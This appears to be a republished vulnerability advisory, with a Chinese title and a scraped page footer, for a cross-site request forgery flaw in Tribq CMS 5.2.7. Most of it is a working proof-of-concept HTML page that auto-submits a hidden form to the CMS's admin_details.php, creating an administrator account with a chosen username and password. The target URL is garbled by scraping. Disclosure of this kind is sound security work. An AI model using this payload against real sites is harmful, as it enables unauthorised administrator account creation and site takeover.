Tribq CMS 5.2.7 CSRF 修改和添加管理员账号 - 网站安

# 标题: Tribq CMS CSRF - Adding/Editing new administrator account # 发现者: Yashar shahinzadeh # 开发商: http://sourceforge.net/projects/tribiq/ # 测试平台: Linux & Windows, PHP 5.2.9 # 影响版本 : 5.2.7 摘要: ======== 1. CSRF - Adding administrator account     1. CSRF - Adding administrator account: ======================================= From my standpoint, Tribq is a good CMS which is immune to many well-known vulnerabilities aside from CSRF. There are too many devastating actions may be done by hacker by conducting CSRF attack, although the critical ones are changing administrator password or adding new one. I provide an example of adding new administrator account, the attack can be done easily, afterwards, such a plain text may be appeared:   {"adminId":20,"adminType":"local"}   < html >     <body onload="submitForm()">     <form name="myForm" id="myForm"     action="http:// HdhCmsTest2cto测试数据 /community-5.2.7c/community-5.2.7c/tb/ajax/admin_details.php" method="post">     <input type="hidden" name="save" value="true">     <input type="hidden" name="adminType" value="local">     <input type="hidden" name="formMode" value="edit">     <input type="hidden" name="username" value="Yashar">     <input type="hidden" name="password" value="Yashar123">     <input type="hidden" name="password_reconfirm" value="Yashar123">     <input type="hidden" name="first_name" value="test">     <input type="hidden" name="last_name" value="test">     <input type="hidden" name="email" value="test@test测试数据">     </form>     <script type='text/javascript'>document.myForm.submit();</script> </html>   /** Yasshar shahinzadeh **/

 

查看更多关于Tribq CMS 5.2.7 CSRF 修改和添加管理员账号 - 网站安的详细内容...